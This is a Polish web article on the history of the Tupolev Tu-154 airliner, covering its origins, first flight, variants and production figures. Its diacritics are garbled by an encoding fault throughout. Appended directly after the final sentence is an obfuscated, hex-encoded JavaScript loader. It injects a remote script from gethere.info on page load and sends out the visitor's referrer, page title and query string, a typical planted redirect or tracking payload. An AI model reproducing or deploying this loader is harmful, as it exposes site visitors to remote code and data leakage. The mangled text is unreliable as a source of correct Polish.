Historia powstania TU-154

Genezy modelu Tupolew Tu-154 naleA?y doszukiwaA� siA� w latach szeA�A�dziesiA�tych XX wieku. Wtedy bowiem wA�adze ZwiA�zku Radzieckiego doszA�y do wniosku, A?e ich flota lotnicza do celA?w cywilnych jest niezwykle przestarzaA�a. PasaA?erowie mogli bowiem liczyA� na samoloty z napA�dem turboA�migA�owym lub Tu-104. Ten ostatni nie tylko konstrukcyjnie siA�gaA� lat piA�A�dziesiA�tych, ale jeszcze opieraA� siA� o rozwiA�zania stosowane w bombowcach. Remedium na takA� sytuacjA� miaA� siA� staA� nowy odrzutowiec pasaA?erski.

Zanim pomysA� trafiA� do konstruktorA?w Biura Projektowego Tupolew, wA�adze uA�oA?yA�y seriA� wymogA?w. W pierwszej kolejnoA�ci samolot musiaA� zostaA� dostosowany do korzystania z dostA�pnej infrastruktury. Lotniska w ZwiA�zku Radzieckim w tamtym czasie byA�y wrA�cz w opA�akanym stanie. Kolejnym z podstawowych wymogA?w, byA�y moA?liwoA�ci transportowe. Maszyna miaA�a zabraA� na pokA�ad co najmniej 120 osA?b wraz z bagaA?em. Tak sprecyzowane plany zostaA�y przekazane inA?ynierom.

Pierwszy prototyp Tu-154 wzbiA� siA� w powietrze 4 paA?dziernika 1968 roku. W 1972 roku regularne loty rozpoczA�A�y pierwsze, dwa samoloty. Na przestrzeni kolejnych kilkunastu lat konstrukcja byA�a regularnie modyfikowana. InA?ynierowie wprowadzali ulepszenia techniczne, ktA?re sprawiaA�y, A?e Tu-154 nadA�A?aA� za zmieniajA�cymi siA� trendami rynkowymi oraz byA� wyposaA?any w nowoczesne osiA�gniA�cia. Na przestrzeni caA�ej produkcji A�wiatA�o dzienne ujrzaA�o co najmniej kilka wersji Tupolewa. JednA� z najbardziej znanych jest Tu-154B. Jego produkcjA� rozpoczA�to w roku 1977, a gA�A?wnA� zaletA� tego modelu byA�o zwiA�kszenie iloA�ci pasaA?erA?w do 180 osA?b.

Ostatecznie produkcja Tupolewa Tu-154 zakoA�czyA�a siA� w roku 2005. W sumie fabrykA� opuA�ciA�o 926 maszyn rA?A?nych wersji. WiA�kszoA�A� egzemplarzy pozostaA�a w ZwiA�zku Radzieckim. 150 wyeksportowanych samolotA?w trafiA�o do flot osiemnastu krajA?w. Ocenia siA�, A?e do dnia dzisiejszego okoA�o szeA�A�set Tu-154 jest wykorzystywanych w transporcie cywilnym i militarnym.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}